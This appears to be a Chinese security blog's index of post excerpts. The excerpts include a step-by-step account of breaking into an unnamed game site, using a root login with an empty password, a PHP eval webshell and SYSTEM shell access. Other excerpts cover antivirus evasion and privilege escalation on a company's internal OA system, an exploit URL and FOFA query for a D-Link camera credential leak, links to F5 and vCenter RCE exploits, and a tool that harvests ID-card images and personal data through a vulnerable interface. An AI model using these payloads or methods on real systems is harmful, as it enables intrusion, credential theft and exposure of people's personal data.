某奇葩游戏站点服务器过程
某奇葩游戏站点服务器过程目标:xxx游戏站发现有phpmyadmin没想到root空口令直接登录这个管理员是真的有多危险接下来就是找网站路径写马运气太好select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'XX'不多说了,直接getshell了发现既然是system权限,那么直接提权吧找终端经过判断,发现了终端直接进服务器嗅探到了几个rdp的东东,不玩了,就到这里本文章只是技术研究,不做任...
信息安全人员想要年薪50W,收藏这一篇就够了!
信息安全人员想要年薪50W,收藏这一篇就够了!1、CISP-PTE(国家注册渗透测试工程师)PTE属于渗透测试方向的专项考试,是国内首个渗透测试领域权威认证,属于特定领域,深度发展,从事的工作属于安全服务方面 。政府背景给认证做背书,想在政府、国企及重点行业从业,企业获取信息安全服务资质,参与网络安全项目,这个证书非常重要。无任何学历及工作经验要求,8天面授培训第9天考试。谷安赠送两次免费补考机会、通过率高达97%以上,含金量高,是计算机、信息安全相关专业高校生以及...
CAS反序列化漏洞
CAS反序列化漏洞https://github.com/potats0/CasExp...
D-Link DCS系列监控 账号密码信息泄露漏洞
D-Link DCS系列监控 账号密码信息泄露漏洞FOFA语法FOFA: app="D_Link-DCS-2530L"利用方式https://xxx.xxxx/config/getuser?index=0...
CVE-2021-22986 F5 BIG-IP 远程代码执行漏洞复现
CVE-2021-22986 F5 BIG-IP 远程代码执行漏洞复现影响版本F5 BIG-IP 16.0.0-16.0.1F5 BIG-IP 15.1.0-15.1.2F5 BIG-IP 14.1.0-14.1.3.1F5 BIG-IP 13.1.0-13.1.3.5F5 BIG-IP 12.1.0-12.1.5.2F5 BIG-IQ 7.1.0-7.1.0.2F5 BIG-IQ 7.0.0-7.0.0.1F5 BIG-IQ 6.0.0-6.1.0漏洞复现fofa搜索关键词...
CVE-2021-21972 vmware vcenter未授权命令执行漏洞
CVE-2021-21972 vmware vcenter未授权命令执行漏洞漏洞poc:https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC利用脚本:https://github.com/NS-Sp4ce/CVE-2021-21972fofa搜索:app="vmware-ESX"||app="vmware-VirtualCenter"||app="...
部分安全行业从业人员自研开源扫描器合集
部分安全行业从业人员自研开源扫描器合集fuzz工具收集https://github.com/ivanfratric/winaflhttps://github.com/attekett/NodeFuzzhttps://github.com/google/oss-fuzzhttp://blog.topsec.com.cn/ad_lab/alphafuzzer/http://llvm.org/docs/LibFuzzer.html子域名枚举https://github.com/li...
7kbscan-WebPathBrute
7kbscan-WebPathBrutehttps://github.com/7kbstorm/7kbscan-WebPathBrute...
神器绕过360杀毒提权内网OA系统过程(一)
神器绕过360杀毒提权内网OA系统过程目标:某XX公司内网OA系统发现有360杀毒,wce传上去直接被杀,烂土豆potato也被杀掉,MSF的木马就更不用说了使用免杀神器提权成功,但是发现没有开启3389,又处于内网所以还需要进行3389开启配合cscript.exe进行On Error Resume Nextconst HKEY_LOCAL_MACHINE = &H80000002strComputer = "."Set StdOut = WSc...
身份证图像采集信息查询工具v1.0
身份证图像采集信息查询工具v1.0关于这个工具很早就想写一个,正好写一个接口查询的工具原理:访问接口,使用正则或者getld获取用户的内容使用io流读写用户图像漏洞调用存在漏洞的接口,进行遍历查询...